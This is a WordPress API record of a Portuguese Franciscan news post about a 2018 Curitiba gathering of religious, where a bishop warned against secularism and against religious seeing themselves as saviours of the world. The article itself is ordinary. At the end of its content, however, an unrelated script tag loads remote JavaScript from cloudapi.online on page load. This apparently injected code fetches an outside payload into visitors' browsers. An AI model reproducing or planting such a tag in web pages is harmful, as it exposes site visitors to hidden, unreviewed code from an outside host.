{"id":169242,"date":"2018-08-19T09:43:40","date_gmt":"2018-08-19T12:43:40","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=169242"},"modified":"2018-08-19T09:43:40","modified_gmt":"2018-08-19T12:43:40","slug":"queremos-ser-salvadores-demais-e-transfiguradores-de-menos","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html","title":{"rendered":"D. Amilton alerta: n\u00e3o somos salvadores do mundo"},"content":{"rendered":"<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/08\/religiosos_190818_3.jpg\" alt=\"religiosos_190818_3\" width=\"830\" height=\"382\" \/><\/p>\n<p><strong>Frei Rodrigo Silva<\/strong><\/p>\n<p><strong>Curitiba (PR)<\/strong> &#8211; A Confer\u00eancia dos Religiosos do Brasil (CRB), Regional Curitiba-PR, promoveu, neste s\u00e1bado (18\/08), encontro celebrativo ao Dia do(a) Religioso(a). Nele, religiosos e religiosas de v\u00e1rias entidades puderam partilhar experi\u00eancias referentes \u00e0 vida religiosa consagrada. Entre eles, a Fraternidade Franciscana S\u00e3o Boaventura, com os frades professos tempor\u00e1rios do tempo de Filosofia, e o mestre Frei Rodrigo da Silva Santos estiveram presentes.<\/p>\n<p>O evento, que ocorreu na capital paranaense, teve como tema: \u201cN\u00e3o \u00e9 que a vida tenha uma miss\u00e3o, mas a vida \u00e9 uma miss\u00e3o\u201d (GE,27), trecho da exorta\u00e7\u00e3o apost\u00f3lica \u201cGaudete et Exultate\u201d, lan\u00e7ada pelo Papa Francisco em 19 de mar\u00e7o do corrente ano. Esta exorta\u00e7\u00e3o foi o tema central da reflex\u00e3o conduzida por Dom Amilton Manoel da Silva, bispo auxiliar da Arquidiocese de Curitiba.<\/p>\n<p>Em suas palavras, Dom Amilton citou a ousadia, a profecia e o testemunho como fatores indispens\u00e1veis para que a vida consagrada seja realmente frutuosa. Citando o Papa Paulo VI, afirmou que \u201ca vida religiosa por si j\u00e1 \u00e9 prof\u00e9tica e a profiss\u00e3o religiosa \u00e9 o grande grito da profecia\u201d, sendo que esta deve sempre ser o referencial de uma alegria que o mundo n\u00e3o \u00e9 capaz de oferecer.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/08\/religiosos_190818_2.jpg\" alt=\"religiosos_190818_2\" width=\"830\" height=\"455\" \/><\/p>\n<p>Alertou tamb\u00e9m sobre a quest\u00e3o do secularismo que inegavelmente adentrou semin\u00e1rios, conventos e os cora\u00e7\u00f5es de muitos consagrados, enfatizando que mesmo assim, \u201co m\u00ednimo que se espera de um consagrado \u00e9 que fa\u00e7a um caminho de santidade\u201d.<\/p>\n<p>Em suas provoca\u00e7\u00f5es, o bispo apresentou um panorama social com dados que revelam o crescimento do n\u00famero de ateus no Brasil e no mundo. Comentou que muitos hoje procuram apenas uma espiritualidade (seja ela qual for) e n\u00e3o mais uma religi\u00e3o. \u201cReligi\u00e3o \u00e9 dogma, doutrina, rito, culto, liturgia, encontro, reuni\u00e3o, comum unidade, compromisso com o pr\u00f3ximo, poucos querem saber disso\u201d, afirmou Dom Amilton.<\/p>\n<p>Citou ainda alguns \u201cmodismos\u201d dentro de nossa pr\u00f3pria religi\u00e3o, como as ora\u00e7\u00f5es, missas e novenas poderosas, os santos da moda, os padres e religiosos midi\u00e1ticos, as curas imediatas, tudo isso formando uma verdadeira \u201csalada m\u00edstica\u201d que vai deturpando o sentido original de nossa f\u00e9.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/08\/religiosos_190818.jpg\" alt=\"religiosos_190818\" width=\"830\" height=\"194\" \/><\/p>\n<p>Finalizou alertando sobre o perigo de acharmos que somos salvadores do mundo, da nossa congrega\u00e7\u00e3o, da nossa prov\u00edncia: \u201cJesus j\u00e1 salvou o mundo. Devemos lutar para salvar a n\u00f3s mesmos, nos transfigurarmos pelo processo a caminho da santidade. N\u00f3s queremos ser salvadores demais e transfiguradores de menos\u201d, afirmou.<\/p>\n<p><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/08\/religiosos_190818_1.jpg\" alt=\"religiosos_190818_1\" width=\"830\" height=\"293\" \/><\/p>\n\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Religiosos do PR<\/p>\n","protected":false},"author":1,"featured_media":187572,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[400],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>D. Amilton alerta: n\u00e3o somos salvadores do mundo - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"D. Amilton alerta: n\u00e3o somos salvadores do mundo - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Religiosos do PR\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-08-19T12:43:40+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/11\/religiosos_190818_3-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"830\" \/>\n\t<meta property=\"og:image:height\" content=\"382\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/11\/religiosos_190818_3-1.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/11\/religiosos_190818_3-1.jpg\",\"width\":830,\"height\":382},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html\",\"name\":\"D. Amilton alerta: n\u00e3o somos salvadores do mundo - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#primaryimage\"},\"datePublished\":\"2018-08-19T12:43:40+00:00\",\"dateModified\":\"2018-08-19T12:43:40+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"D. Amilton alerta: n\u00e3o somos salvadores do mundo\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"D. Amilton alerta: n\u00e3o somos salvadores do mundo - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html","og_locale":"pt_BR","og_type":"article","og_title":"D. Amilton alerta: n\u00e3o somos salvadores do mundo - Not\u00edcias - Franciscanos","og_description":"Religiosos do PR","og_url":"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-08-19T12:43:40+00:00","og_image":[{"width":830,"height":382,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/11\/religiosos_190818_3-1.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/11\/religiosos_190818_3-1.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/11\/religiosos_190818_3-1.jpg","width":830,"height":382},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html","name":"D. Amilton alerta: n\u00e3o somos salvadores do mundo - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#primaryimage"},"datePublished":"2018-08-19T12:43:40+00:00","dateModified":"2018-08-19T12:43:40+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/queremos-ser-salvadores-demais-e-transfiguradores-de-menos.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"D. Amilton alerta: n\u00e3o somos salvadores do mundo"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/169242"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=169242"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/169242\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/187572"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=169242"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=169242"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=169242"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}